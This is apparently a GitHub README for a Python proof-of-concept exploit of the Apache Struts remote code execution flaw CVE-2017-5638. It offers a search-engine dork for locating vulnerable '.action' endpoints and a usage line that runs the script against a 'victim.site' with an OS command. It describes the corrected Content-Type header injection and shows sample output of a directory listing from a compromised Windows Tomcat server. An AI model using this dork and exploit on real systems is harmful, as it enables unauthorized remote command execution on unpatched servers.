
https://github.com/xsscx/cve-2017-5638

Example PoC Code for CVE-2017-5638 | Apache Struts Exploit

apache code content-type cve-2017-5638 exploit poc python struts2


# CVE-2017-5638 PoC Code in Python | DORK: ext:action
Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action

USAGE: `python struts.py https://victim.site dir`

The initial Python script that was posted didn't correctly format the Content-Type header.
I recoded the Content-Type header to properly format Content-Type:%20{Exploit}.
I also added logging and Requests, then dumped the object properties to stdout.

SAMPLE OUTPUT

Check for CVE-2017-5638 by XSS.Cx

Volume in drive D has no label.
Volume Serial Number is 2A7B-A245
Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0